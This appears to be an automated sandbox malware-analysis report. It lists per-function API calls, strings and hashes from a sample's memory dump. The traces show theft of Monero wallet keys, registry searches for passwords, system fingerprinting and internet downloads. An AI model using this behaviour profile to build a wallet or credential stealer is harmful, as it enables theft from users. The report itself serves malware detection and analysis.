                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F667
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                                                                                                              • Opcode ID: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
                                                                                                                                                                                                                              • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004012E7
                                                                                                                                                                                                                                • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004014D0
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                              • API String ID: 2054947926-218353709
                                                                                                                                                                                                                              • Opcode ID: 33848626fbaf5211245e59cc062cba06af5fe8c0e6f0d2c77249055f748380b4
                                                                                                                                                                                                                              • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33848626fbaf5211245e59cc062cba06af5fe8c0e6f0d2c77249055f748380b4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                              • lstrcat.KERNEL32(3095D020,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                              • lstrcat.KERNEL32(3095D020,00000000), ref: 00407018
                                                                                                                                                                                                                              • lstrcat.KERNEL32(3095D020, : ), ref: 0040702A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(3095D020,00000000), ref: 0040705F
                                                                                                                                                                                                                              • lstrcat.KERNEL32(3095D020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                              • lstrcat.KERNEL32(3095D020,00000000), ref: 004070A3
                                                                                                                                                                                                                              • lstrcat.KERNEL32(3095D020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                              • task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                                                                              • String ID: : $`v@$h0A
                                                                                                                                                                                                                              • API String ID: 3191641157-3559972273
                                                                                                                                                                                                                              • Opcode ID: 22c65c759e4008ac886b6aeda8a47d70719bcccf3909e077351c77a1654b374d
                                                                                                                                                                                                                              • Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22c65c759e4008ac886b6aeda8a47d70719bcccf3909e077351c77a1654b374d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                                                                              • API String ID: 0-3785015651
                                                                                                                                                                                                                              • Opcode ID: ebc458d2954fa87928cbffb1aa81fa40cba8a6fc2b0c4bc732e2d226e351cda2
                                                                                                                                                                                                                              • Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebc458d2954fa87928cbffb1aa81fa40cba8a6fc2b0c4bc732e2d226e351cda2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                                                                                                                                              • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                                                                                              • String ID: c.A$c.A
                                                                                                                                                                                                                              • API String ID: 3066467675-270182787
                                                                                                                                                                                                                              • Opcode ID: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
                                                                                                                                                                                                                              • Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                • Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B
                                                                                                                                                                                                                              • task.LIBCPMTD ref: 00406F25
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                              • String ID: Password
                                                                                                                                                                                                                              • API String ID: 2698061284-3434357891
                                                                                                                                                                                                                              • Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                              • Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004142DD
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                              • String ID: :$C$\
                                                                                                                                                                                                                              • API String ID: 3790021787-3809124531
                                                                                                                                                                                                                              • Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                              • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                              • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                              • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                                                                                                                              • String ID: '@$'@
                                                                                                                                                                                                                              • API String ID: 1815715184-345573653
                                                                                                                                                                                                                              • Opcode ID: 48f4b7413470cb3276c60afe27c6050599c7e1b25b920e3e6a5c65917fe61f9c
                                                                                                                                                                                                                              • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48f4b7413470cb3276c60afe27c6050599c7e1b25b920e3e6a5c65917fe61f9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,042F6AA8,00000000,?,0041D774,00000000,?,00000000,00000000,?,042F6A78), ref: 0041496D
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                              • String ID: %d MB$@
                                                                                                                                                                                                                              • API String ID: 2886426298-3474575989
                                                                                                                                                                                                                              • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                              • Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,042F0A68), ref: 00405DE7
                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                                                                                                                                              • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 729276229-0
                                                                                                                                                                                                                              • Opcode ID: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
                                                                                                                                                                                                                              • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00413D9E
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413E2A
                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00413F7E
                                                                                                                                                                                                                              Strings
